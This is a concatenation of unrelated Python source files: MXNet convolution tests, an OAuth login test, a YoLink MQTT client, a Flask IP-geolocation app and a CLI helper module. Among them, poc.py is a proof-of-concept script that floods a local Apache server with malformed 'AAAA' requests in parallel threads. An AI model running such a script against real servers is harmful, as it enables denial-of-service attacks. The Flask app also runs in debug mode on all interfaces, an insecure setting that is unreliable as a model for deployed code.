c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
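# Worked check of the expected gradient above: with a = 1 and an initial b = 2,
# the recorded graph computes b = 2 * a**nrepeat, so db/da = 2 * nrepeat *
# a**(nrepeat - 1) = 2 * nrepeat at a = 1, which both the 'write' and 'add'
# grad_req paths must reproduce.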
|
test_oauth.py
|
import unittest
import random
import time
import base64
import json
import requests
from flask import Flask, jsonify, make_response, request, redirect
from multiprocessing import Process
import jose
from server.common.app_config import AppConfig
from server.test import FIXTURES_ROOT, test_server
# This tests the oauth authentication type.
# This test starts a cellxgene server and a mock oauth server.
# API requests to log in, log out, and fetch the userinfo are made
# to the cellxgene server, which in turn sends requests to the mock
# oauth server.
# number of seconds that the oauth token is valid
TOKEN_EXPIRES = 5
# Create a mocked-out oauth server, which serves all the endpoints needed by the oauth authentication type.
mock_oauth_app = Flask("mock_oauth_app")
@mock_oauth_app.route("/authorize")
def authorize():
callback = request.args.get("redirect_uri")
state = request.args.get("state")
return redirect(callback + f"?code=fakecode&state={state}")
@mock_oauth_app.route("/oauth/token", methods=["POST"])
def token():
headers = dict(alg="RS256", kid="fake_kid")
payload = dict(name="fake_user", sub="fake_id", email="fake_user@email.com", email_verified=True)
jwt = jose.jwt.encode(claims=payload, key="mysecret", algorithm="HS256", headers=headers)
r = {
"access_token": f"access-{time.time()}",
"id_token": jwt,
"refresh_token": f"random-{time.time()}",
"scope": "openid profile email",
"expires_in": TOKEN_EXPIRES,
"token_type": "Bearer",
"expires_at": time.time() + TOKEN_EXPIRES,
}
return make_response(jsonify(r))
@mock_oauth_app.route("/v2/logout")
def logout():
return_to = request.args.get("returnTo")
return redirect(return_to)
@mock_oauth_app.route("/.well-known/jwks.json")
def jwks():
data = dict(alg="RS256", kty="RSA", use="sig", kid="fake_kid",)
return make_response(jsonify(dict(keys=[data])))
# The port that the mock oauth server will listen on
PORT = random.randint(10000, 12000)
# function to launch the mock oauth server
def launch_mock_oauth():
mock_oauth_app.run(port=PORT)
class AuthTest(unittest.TestCase):
def setUp(self):
self.dataset_dataroot = FIXTURES_ROOT
self.mock_oauth_process = Process(target=launch_mock_oauth)
self.mock_oauth_process.start()
def tearDown(self):
self.mock_oauth_process.terminate()
def auth_flow(self, app_config, cookie_key=None):
with test_server(app_config=app_config) as server:
session = requests.Session()
# auth datasets
config = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config").json()
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertFalse(userinfo["userinfo"]["is_authenticated"])
self.assertIsNone(userinfo["userinfo"]["username"])
self.assertTrue(config["config"]["authentication"]["requires_client_login"])
self.assertTrue(config["config"]["parameters"]["annotations"])
login_uri = config["config"]["authentication"]["login"]
logout_uri = config["config"]["authentication"]["logout"]
self.assertEqual(login_uri, "/login?dataset=d/pbmc3k.cxg/")
self.assertEqual(logout_uri, "/logout")
r = session.get(f"{server}/{login_uri}")
# check that the login redirect worked
self.assertEqual(r.history[0].status_code, 302)
self.assertEqual(r.url, f"{server}/d/pbmc3k.cxg/")
config = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config").json()
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertTrue(userinfo["userinfo"]["is_authenticated"])
self.assertEqual(userinfo["userinfo"]["username"], "fake_user")
self.assertTrue(config["config"]["parameters"]["annotations"])
if cookie_key:
cookie = session.cookies.get(cookie_key)
token = json.loads(base64.b64decode(cookie))
access_token_before = token.get("access_token")
expires_at_before = token.get("expires_at")
# let the token expire
time.sleep(TOKEN_EXPIRES + 1)
# check that refresh works
session.get(f"{server}/{login_uri}")
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertTrue(userinfo["userinfo"]["is_authenticated"])
self.assertEqual(userinfo["userinfo"]["username"], "fake_user")
cookie = session.cookies.get(cookie_key)
token = json.loads(base64.b64decode(cookie))
access_token_after = token.get("access_token")
expires_at_after = token.get("expires_at")
self.assertNotEqual(access_token_before, access_token_after)
self.assertTrue(expires_at_after - expires_at_before > TOKEN_EXPIRES)
r = session.get(f"{server}/{logout_uri}")
# check that the logout redirect worked
self.assertEqual(r.history[0].status_code, 302)
self.assertEqual(r.url, f"{server}")
config = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config").json()
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertFalse(userinfo["userinfo"]["is_authenticated"])
self.assertIsNone(userinfo["userinfo"]["username"])
self.assertTrue(config["config"]["parameters"]["annotations"])
def test_auth_oauth_session(self):
# test with session cookies
app_config = AppConfig()
app_config.update_server_config(
authentication__type="oauth",
authentication__params_oauth__api_base_url=f"http://localhost:{PORT}",
authentication__params_oauth__client_id="mock_client_id",
authentication__params_oauth__client_secret="mock_client_secret",
authentication__params_oauth__session_cookie=True,
)
app_config.update_server_config(multi_dataset__dataroot=self.dataset_dataroot)
app_config.complete_config()
self.auth_flow(app_config)
def test_auth_oauth_cookie(self):
# test with specified cookie
app_config = AppConfig()
app_config.update_server_config(
authentication__type="oauth",
authentication__params_oauth__api_base_url=f"http://localhost:{PORT}",
authentication__params_oauth__client_id="mock_client_id",
authentication__params_oauth__client_secret="mock_client_secret",
authentication__params_oauth__session_cookie=False,
authentication__params_oauth__cookie=dict(key="test_cxguser", httponly=True, max_age=60),
)
app_config.update_server_config(multi_dataset__dataroot=self.dataset_dataroot)
app_config.complete_config()
self.auth_flow(app_config, "test_cxguser")
|
poc.py
|
#! /usr/bin/env python
import httplib
import sys
import threading
import subprocess
import random
def send_request(method, url):
try:
c = httplib.HTTPConnection('127.0.0.1', 80)
c.request(method,url);
if "foo" in url:
print c.getresponse().read()
c.close()
except Exception, e:
print e
pass
def mod_status_thread():
while True:
send_request("GET", "/")
def requests():
evil = ''.join('A' for i in range(random.randint(0, 1024)))
while True:
send_request(evil, evil)
threading.Thread(target=mod_status_thread).start()
threading.Thread(target=requests).start()
|
yolink_mqtt_class.py
|
import hashlib
import json
import os
import sys
import time
import threading
import logging
from datetime import datetime
from dateutil.tz import *
logging.basicConfig(level=logging.DEBUG)
import paho.mqtt.client as mqtt
#from logger import getLogger
#log = getLogger(__name__)
from queue import Queue
from yolink_devices import YoLinkDevice
#from yolink_mqtt_client import YoLinkMQTTClient
#from yolink_mqtt_device import YoLinkMQTTClient
"""
Object representation for YoLink MQTT Client
"""
class YoLinkMQTTDevice(YoLinkDevice):
def __init__(self, csName, csid, csseckey, yolink_URL, mqtt_URL, mqtt_port, serial_num, callback):
super().__init__( yolink_URL, csid, csseckey, serial_num)
self.callback = callback
self.uniqueID = serial_num[0:10]
self.uniqueID = str(csName+'_'+ self.uniqueID )
self.build_device_api_request_data()
self.enable_device_api()
self.csid = csid
self.csseckey = csseckey
self.topicReq = csName+'/'+ self.uniqueID +'/request'
self.topicResp = csName+'/'+ self.uniqueID +'/response'
self.topicReport = csName+'/'+ self.uniqueID +'/report'
self.topicReportAll = csName+'/report'
self.yolink_URL = yolink_URL
self.mqtt_url = mqtt_URL
self.daysOfWeek = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']
self.mqtt_port = int(mqtt_port)
self.targetId = self.get_id()
self.lastUpdate = 'lastTime'
self.lastMessage = 'lastMessage'
self.deviceOnline = 'online'
self.deviceData = 'data'
self.deviceInfo = 'state'
self.deviceSchedule = 'schedules'
self.deviceDelays = 'delays' #may not be needed
self.messageTime = 'time'
self.forceStop = False
self.dataAPI = {
'lastTime':str(int(time.time()*1000))
,'lastMessage':{}
,'Online':None
,'data':{ 'state':{} }
}
self.dataQueue = Queue()
self.eventQueue = Queue()
self.mutex = threading.Lock()
self.timezoneOffsetSec = self.timezoneOffsetSec()
self.client = mqtt.Client(self.uniqueID, clean_session=True, userdata=None, protocol=mqtt.MQTTv311, transport="tcp")
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.on_subscribe = self.on_subscribe
self.client.on_disconnect = self.on_disconnect
self.updateInterval = 3
self.messagePending = False
def connect_to_broker(self):
"""
Connect to MQTT broker
"""
logging.info("Connecting to broker...")
self.client.username_pw_set(username=self.csid, password=hashlib.md5(self.csseckey.encode('utf-8')).hexdigest())
self.client.connect(self.mqtt_url, self.mqtt_port, 30)
logging.debug ('connect:')
self.client.loop_start()
#self.client.loop_forever()
#logging.debug('loop started')
time.sleep(1)
def on_message(self, client, userdata, msg):
"""
Callback for broker published events
"""
logging.debug('on_message')
#logging.debug(client)
#logging.debug(userdata)
#logging.debug(msg)
#logging.debug(msg.topic, msg.payload)
payload = json.loads(msg.payload.decode("utf-8"))
if msg.topic == self.topicReportAll or msg.topic == self.topicReport:
if payload['deviceId'] == self.targetId:
#self.eventQueue.put(payload['msgid'])
self.dataQueue.put(payload)
logging.debug (payload)
self.callback(payload)
else:
logging.debug ('\n report on different device : ' + msg.topic)
logging.debug (payload)
logging.debug('\n')
elif msg.topic == self.topicResp:
self.dataQueue.put(payload)
logging.debug (payload)
self.callback(payload)
elif msg.topic == self.topicReq:
logging.debug('publishing request' )
logging.debug (payload)
self.callback(payload)
else:
logging.debug(msg.topic, self.topicReport, self.topicReportAll )
#logging.debug("Event:{0} Device:{1} State:{2}".format(event, self.device_hash[deviceId].get_name(), state))
def on_connect(self, client, userdata, flags, rc):
"""
Callback for connection to broker
"""
logging.debug("Connected with result code %s" % rc)
#logging.debug( client, userdata, flags)
if (rc == 0):
logging.debug("Successfully connected to broker %s" % self.mqtt_url)
else:
logging.debug("Connection with result code %s" % rc);
sys.exit(2)
time.sleep(1)
logging.debug('Subscribe: ' + self.topicResp + ', ' + self.topicReport + ', ' + self.topicReportAll)
test1 = self.client.subscribe(self.topicResp)
#logging.debug(test1)
test2 = self.client.subscribe(self.topicReport)
#logging.debug(test2)
test3 = self.client.subscribe(self.topicReportAll)
#logging.debug(test3)
def on_disconnect(self, client, userdata,rc=0):
logging.debug('Disconnect - stop loop')
self.client.loop_stop()
def on_subscribe(self, client, userdata, mID, granted_QOS):
logging.debug('on_subscribe')
logging.debug('on_subscribe called')
logging.debug('client = ' + str(client))
logging.debug('userdata = ' + str(userdata))
logging.debug('mID = '+str(mID))
logging.debug('Granted QoS: ' + str(granted_QOS))
logging.debug('\n')
def on_publish(self, client, userdata, mID):
logging.debug('on_publish')
#logging.debug('client = ' + str(client))
#logging.debug('userdata = ' + str(userdata))
#logging.debug('mID = '+str(mID))
#logging.debug('\n')
def publish_data(self, data, callback):
logging.debug('publish_data: ' + data['method'])
dataTemp = str(json.dumps(data))
test = self.client.publish(self.topicReq, dataTemp)
if test.rc == 0:
time.sleep(2)
self.updateData(callback)
def shurt_down(self):
self.client.loop_stop()
def getData(self):
#expirationTime = int(time.time()*1000-60*60*1000) # 1 hour in milisec
if not(self.dataQueue.empty()):
temp = self.dataQueue.get()
dataOK = False
if 'event' in temp:
dataOK = True
if 'method' in temp:
dataOK = temp['code'] == '000000'
return(dataOK, temp)
else:
return(False, None)
'''
def eventMessagePending(self):
logging.debug('getEventData')
return(not self.eventQueue.empty())
def getEventMsgId(self):
logging.debug('getEventMsgId')
temp = (self.eventQueue.get())
return(temp)
'''
def monitorLoop(self, callback, updateInterval):
Monitor = threading.Thread(target = self.eventMonitorThread, args = (callback, updateInterval ))
Monitor.start()
def eventMonitorThread (self, callback, updateInterval):
time.sleep(5)
while not self.forceStop:
time.sleep(updateInterval)
while not self.dataQueue.empty():
self.updateData(callback)
logging.debug('eventMonitorThread GET DATA')
logging.debug('eventMonitorThread')
def updateData(self, callback):
self.mutex.acquire()
dataOK, rxdata = self.getData()
if dataOK:
callback(rxdata)
self.mutex.release()
def refreshDevice(self, methodStr, callback):
logging.debug(methodStr)
data = {}
data['time'] = str(int(time.time())*1000)
data['method'] = methodStr
data["targetDevice"] = self.get_id()
data["token"]= self.get_token()
self.publish_data(data, callback)
def setDevice(self, methodStr, data, callback):
data['time'] = str(int(time.time())*1000)
data['method'] = methodStr
data["targetDevice"] = self.get_id()
data["token"]= self.get_token()
self.publish_data( data, callback)
def getValue(self, data, key):
attempts = 1
while key not in data and attempts <3:
time.sleep(1)
attempts = attempts + 1
if key in data:
return(data[key])
else:
return('NA')
def daysToMask (self, dayList):
daysValue = 0
i = 0
for day in self.daysOfWeek:
if day in dayList:
daysValue = daysValue + pow(2,i)
i = i+1
return(daysValue)
def maskToDays(self, daysValue):
daysList = []
for i in range(0, 7): # check all seven day bits
mask = pow(2,i)
if (daysValue & mask) != 0 :
daysList.append(self.daysOfWeek[i])
return(daysList)
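# Worked example: daysToMask(['mon', 'wed']) = 2 + 8 = 10 (bit i set for
# self.daysOfWeek[i]), and maskToDays(10) returns ['mon', 'wed'].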
def updateStatusData (self, data):
if 'online' in data[self.deviceData]:
self.dataAPI[self.deviceOnline] = data[self.deviceData][self.deviceOnline]
else:
self.dataAPI[self.deviceOnline] = True
if 'method' in data:
for key in data[self.deviceData][self.deviceInfo]:
self.dataAPI[self.deviceData][self.deviceInfo][key] = data[self.deviceData][self.deviceInfo][key]
else: #event
for key in data[self.deviceData]:
self.dataAPI[self.deviceData][self.deviceInfo][key] = data[self.deviceData][key]
self.dataAPI[self.lastUpdate] = data[self.messageTime]
self.dataAPI[self.lastMessage] = data
def eventPending(self):
if not self.eventQueue.empty():
return(self.eventQueue.get())
else:
return(None)
def getInfoAPI (self):
return(self.dataAPI)
def getState(self):
return(self.dataAPI[self.deviceData][self.deviceInfo]['state'])
def getInfoValue(self, key):
if key in self.dataAPI[self.deviceData][self.deviceInfo]:
return(self.dataAPI[self.deviceData][self.deviceInfo][key])
else:
return(None)
def sensorOnline(self):
return(self.dataAPI['online'] )
def getLastUpdate (self):
return(self.dataAPI[self.lastUpdate])
def updateGarageCtrlStatus(self, data):
self.dataAPI[self.deviceData][self.deviceInfo] = data['data']
self.dataAPI[self.lastUpdate] = data[self.messageTime]
self.dataAPI[self.lastMessage] = data
def getTempValueF(self):
return(self.getInfoValue('temperature')*9/5+32)
def getTempValueC(self):
return(self.getInfoValue('temperature'))
def getHumidityValue(self):
return(self.getInfoValue('humidity'))
def getAlarms(self):
return(self.getInfoValue('humidity'))
def timezoneOffsetSec(self):
local = tzlocal()
tnow = datetime.now()
tnow = tnow.replace(tzinfo = local)
utctnow = tnow.astimezone(tzutc())
tnowStr = str(tnow)
pos = tnowStr.rfind('+')
if pos > 0:
tnowStr = tnowStr[0:pos]
else:
pos = tnowStr.rfind('-')
tnowStr = tnowStr[0:pos]
utctnowStr = str(utctnow)
pos = utctnowStr.rfind('+')
if pos > 0:
utctnowStr = utctnowStr[0:pos]
else:
pos = utctnowStr.rfind('-')
utctnowStr = utctnowStr[0:pos]
tnow = datetime.strptime(tnowStr, '%Y-%m-%d %H:%M:%S.%f')
utctnow = datetime.strptime(utctnowStr, '%Y-%m-%d %H:%M:%S.%f')
diff = utctnow - tnow
return (diff.total_seconds())
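# Hedged usage sketch (not part of the original module): how a caller might
# wire this class up. All credential, host and port values below are
# placeholders, and the function is never invoked here.
def _example_usage():
    def on_payload(payload):
        print(payload)
    dev = YoLinkMQTTDevice(csName='yolink', csid='<csid>', csseckey='<secret-key>',
                           yolink_URL='<api-url>', mqtt_URL='<broker-host>',
                           mqtt_port=8003, serial_num='<device-serial>',
                           callback=on_payload)
    dev.connect_to_broker()
    dev.monitorLoop(on_payload, dev.updateInterval)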
|
main.py
|
import os
import geoip2.database
import re as ree
import time
import IP2Proxy
import custom_
from threading import Thread
from audio import WeebGen, WeebDel
from flask import Flask, request, render_template, jsonify
from config import home_dir, allowed_requests, clear_ban, error_emotes
db = IP2Proxy.IP2Proxy()
db.open(home_dir+"DB/IP2PROXY-LITE-PX.BIN")
reader = geoip2.database.Reader(home_dir+'DB/GeoLite2-City.mmdb')
app = Flask(__name__)
app.config['JSON_SORT_KEYS'] = False
dedasn = custom_.dedasn()
Data = {}
IP_bans = []
IP_Regex = r'^((\d{1,2}|1\d{2}|2[0-4]\d|25[0-5])\.){3}(\d{1,2}|1\d{2}|2[0-4]\d|25[0-5])$'
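# The regex accepts dotted quads whose octets are 0-255, e.g. '192.168.0.1';
# out-of-range octets such as '256.1.1.1' are rejected.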
def ip_audio(IP):
IPfile = str(IP).replace('.', '-')
if not os.path.exists(home_dir+'static/generated/'+IPfile+'.mp3'):
WeebGen(IP)
thread = Thread(target=WeebDel, args=(IP,))
thread.daemon = True
thread.start()
return '/static/generated/'+IPfile+'.mp3'
def clear_bans():
while True:
time.sleep(clear_ban)
IP_bans.clear()
@app.route("/", methods=['GET'])
@app.route("/home", methods=['GET'])
@app.route("/basic", methods=['GET'])
def home():
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Data = {
'title': 'Home',
'IP': IP_addr,
'audio': ip_audio(IP_addr),
}
return render_template('home.html', data=Data)
@app.route("/", methods=['POST'])
@app.route("/home", methods=['POST'])
@app.route("/basic", methods=['POST'])
def home_post():
IP = request.form['ip']
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Data = {
'title': 'Home',
'IP': IP,
}
if ree.match(IP_Regex, IP):
if IP_bans.count(IP_addr) < allowed_requests:
Data['audio'] = ip_audio(IP)
IP_bans.append(IP_addr)
else:
Data['audio'] = 'static/crab/crabrave.mp3'
Data['error'] = 'Your IP Gone, You\'re on cooldown'
Data['emote'] = error_emotes['cooldown']
else:
Data['IP'] = ''
Data['audio'] = 'static/crab/baka.mp3'
Data['error'] = 'Invalid IP address'
Data['emote'] = error_emotes['invalid']
return render_template('home.html', data=Data)
@app.route("/advanced", methods=['GET'])
def advanced():
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
UA = request.headers.get('User-Agent')
Data = {
'title': 'Advanced',
'IP': IP_addr,
'user_agent': UA,
'audio': ip_audio(IP_addr),
'proxy_type': db.get_proxy_type(IP_addr),
'self_ip': IP_addr,
}
try:
response = reader.city(IP_addr)
re = dedasn.isp(IP_addr)
Data['country_name'] = response.country.name
Data['country_iso_code'] = response.country.iso_code
Data['subdiv'] = response.subdivisions.most_specific.name
Data['subdiv_iso_code'] = response.subdivisions.most_specific.iso_code
Data['city'] = response.city.name
Data['postal_code'] = response.postal.code
Data['latitude'] = response.location.latitude
Data['longitude'] = response.location.longitude
Data['ISP'] = re['isp']
Data['ASN'] = re['asn']
Data['proxy_type'] = db.get_proxy_type(IP_addr)
except Exception:
Data['error'] = 'IP address not in database'
Data['emote'] = error_emotes['database']
return render_template('advanced.html', data=Data)
@app.route("/advanced", methods=['POST'])
def advanced_post():
IP = request.form['ip']
UA = request.headers.get('User-Agent')
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Data = {
'title': 'Advanced',
'IP': IP,
'user_agent': UA,
'proxy_type': db.get_proxy_type(IP),
'self_ip': IP_addr,
}
if ree.match(IP_Regex, IP):
if IP_bans.count(IP_addr) < allowed_requests:
try:
response = reader.city(IP)
re = dedasn.isp(IP)
Data['audio'] = ip_audio(IP)
Data['country_name'] = response.country.name
Data['country_iso_code'] = response.country.iso_code
Data['subdiv'] = response.subdivisions.most_specific.name
Data['subdiv_iso_code'] = response.subdivisions.most_specific.iso_code
Data['city'] = response.city.name
Data['postal_code'] = response.postal.code
Data['latitude'] = response.location.latitude
Data['longitude'] = response.location.longitude
Data['ISP'] = re['isp']
Data['ASN'] = re['asn']
IP_bans.append(IP_addr)
except Exception:
Data['audio'] = ip_audio(IP)
Data['error'] = 'IP address not in database'
Data['emote'] = error_emotes['database']
else:
Data['audio'] = 'static/crab/crabrave.mp3'
Data['error'] = 'Your IP Gone, You\'re on cooldown'
Data['emote'] = error_emotes['cooldown']
else:
Data['IP'] = ''
Data['audio'] = 'static/crab/baka.mp3'
Data['error'] = 'Invalid IP address'
Data['emote'] = error_emotes['invalid']
return render_template('advanced.html', data=Data)
@app.route("/api", methods=['GET', 'POST'])
def API():
Data = {'title': 'API'}
return render_template('api.html', data=Data)
@app.route("/about", methods=['GET', 'POST'])
def about():
Data = {'title': 'About'}
return render_template('about.html', data=Data)
@app.route("/api/v1", methods=['GET', 'POST'])
def api():
IP = str(request.args.get('ip'))
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Type = str(request.args.get('data'))
error_ = {'status': 'error', 'message': 'error message'}
if IP == '127.0.0.1' or IP.lower() == 'localhost':
error_['message'] = 'localhost: your peepee is smoll'
return jsonify(error_)
elif ree.match(IP_Regex, IP):
if IP_bans.count(IP_addr) < allowed_requests:
Data = {}
try:
response = reader.city(IP)
resp = dedasn.isp(IP)
Data = {
'status': 'true',
'IP': IP,
'audio': ip_audio(IP),
'country_name': response.country.name,
'country_iso_code': response.country.iso_code,
'subdiv': response.subdivisions.most_specific.name,
'subdiv_iso_code': response.subdivisions.most_specific.iso_code,
'city': response.city.name,
'postal_code': response.postal.code,
'latitude': response.location.latitude,
'longitude': response.location.longitude,
'isp': resp['isp'],
'asn': resp['asn'],
'proxy_type': db.get_proxy_type(IP),
}
IP_bans.append(IP_addr)
if Type == 'all' or Type == 'None':
return jsonify(Data)
else:
new_Data = {}
Type = Type.split(',')
for i in Type:
new_Data[i] = Data[i]
return jsonify(new_Data)
except Exception:
error_['message'] = 'IP not in database or wrong data type'
return jsonify(error_)
else:
error_['message'] = 'You\'ve achieved your limit, fucc off sir'
return jsonify(error_)
else:
error_['message'] = 'Invalid IP Address'
return jsonify(error_)
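# Illustrative request against the endpoint above (host and port are whatever
# the app is served on, e.g. the dev server started below):
#   GET /api/v1?ip=8.8.8.8&data=country_name,isp
# 'data' is a comma-separated whitelist of the keys built in Data; omitting it
# (or passing data=all) returns the full object, and errors come back as
# {"status": "error", "message": "..."}.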
if __name__ == "__main__":
thread1 = Thread(target=clear_bans)
thread1.daemon = True
thread1.start()
app.run(host='0.0.0.0', port=5000, debug=True)
|
ChangeWaveRangeWidget.py
|
from PySide2.QtWidgets import (QHBoxLayout, QProgressBar, QLabel, QWidget)
from Assets.mathematical_scripts.util import createWaveFilePatientXSLX, createWaveFilePatientMAT
import threading
import glob
# wavesToUpdate is a list containing the waves whose range has changed; the other waves are left unchanged.
class ChangeWaveRangeWidget(QWidget):
def __init__(self, wavesToUpdate):
QWidget.__init__(self)
self.setWindowTitle("Change range - EEG IHM")
self.waves = wavesToUpdate
WriteWavesRange() #Save the new range for next use
self.layout = self.CreateLayout()
self.setLayout(self.layout)
threading.Thread(target=self.createWavesAlphaBetaThetaDelta, daemon=True).start() #Launch the function in another thread to avoid GUI freezing
def CreateLayout(self):
layout = QHBoxLayout()
self.progressBar = QProgressBar(self)
layout.addWidget(self.progressBar)
self.progressLabel = QLabel("0")
layout.addWidget(self.progressLabel)
layout.addWidget(QLabel("%"))
return layout
#Create new wave file with new range
def createWavesAlphaBetaThetaDelta(self):
n = 0
for d in directories:
filesxslx = [file.split('\\')[-1] for file in glob.glob('./Datas/Raw/'+ d +'/' + '*.xlsx')] #take only files with xlsx extension
filesmat = [file.split('\\')[-1] for file in glob.glob('./Datas/Raw/'+ d +'/' + '*.mat')] #take only files with mat extension
for file in filesxslx:
for wave in self.waves:
n += 1
createWaveFilePatientXSLX(file, d, wave)
progress = round(n / (len(directories) * (len(filesxslx) + len(filesmat)) * len(self.waves)), 2) * 100
self.progressBar.setValue(progress)
self.progressLabel.setText(str(progress))
for file in filesmat:
for wave in self.waves:
n += 1
createWaveFilePatientMAT(file, d, wave)
progress = round(n / (len(directories) * (len(filesxslx) + len(filesmat)) * len(self.waves)), 2) * 100
self.progressBar.setValue(progress)
self.progressLabel.setText(str(progress))
self.close()
|
plac_ext.py
|
# this module requires Python 2.6+
from __future__ import with_statement
from contextlib import contextmanager
from operator import attrgetter
from gettext import gettext as _
import inspect
import os
import sys
import cmd
import shlex
import subprocess
import argparse
import itertools
import traceback
import multiprocessing
import signal
import threading
import plac_core
version = sys.version_info[:2]
if version < (3, 5):
from imp import load_source
else:
import importlib.util
def load_source(dotname, path):
spec = importlib.util.spec_from_file_location(dotname, path)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
return mod
if sys.version < '3':
def exec_(_code_, _globs_=None, _locs_=None):
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec('''
def raise_(tp, value=None, tb=None):
raise tp, value, tb
''')
else:
exec_ = eval('exec')
def raise_(tp, value=None, tb=None):
"""
A function that matches the Python 2.x ``raise`` statement. This
allows re-raising exceptions with the cls value and traceback on
Python 2 and 3.
"""
if value is not None and isinstance(tp, Exception):
raise TypeError("instance exception may not have a separate value")
if value is not None:
exc = tp(value)
else:
exc = tp
if exc.__traceback__ is not tb:
raise exc.with_traceback(tb)
raise exc
try:
raw_input
except NameError: # python 3
raw_input = input
def decode(val):
"""
Decode an object assuming the encoding is UTF-8.
"""
try:
# assume it is an encoded bytes object
return val.decode('utf-8')
except AttributeError:
# it was an already decoded unicode object
return str(val)
# ############################ generic utils ############################### #
@contextmanager
def stdout(fileobj):
"usage: with stdout(file('out.txt', 'a')): do_something()"
orig_stdout = sys.stdout
sys.stdout = fileobj
try:
yield
finally:
sys.stdout = orig_stdout
def write(x):
"Write str(x) on stdout and flush, no newline added"
sys.stdout.write(str(x))
sys.stdout.flush()
def gen_val(value):
"Return a generator object with a single element"
yield value
def gen_exc(etype, exc, tb):
"Return a generator object raising an exception"
raise_(etype, exc, tb)
yield
def less(text):
"Send a text to less via a pipe"
# -c clear the screen before starting less
po = subprocess.Popen(['less', '-c'], stdin=subprocess.PIPE)
try:
po.stdin.write(text)
except IOError:
pass
po.stdin.close()
po.wait()
use_less = (sys.platform != 'win32') # unices
class TerminatedProcess(Exception):
pass
def terminatedProcess(signum, frame):
raise TerminatedProcess
# ########################## readline support ############################ #
def read_line(stdin, prompt=''):
"Read a line from stdin, using readline when possible"
if isinstance(stdin, ReadlineInput):
return stdin.readline(prompt)
else:
write(prompt)
return stdin.readline()
def read_long_line(stdin, terminator):
"""
Read multiple lines from stdin until the terminator character is found,
then yield a single space-separated long line.
"""
while True:
lines = []
while True:
line = stdin.readline() # ends with \n
if not line: # EOF
return
line = line.strip()
if not line:
continue
elif line[-1] == terminator:
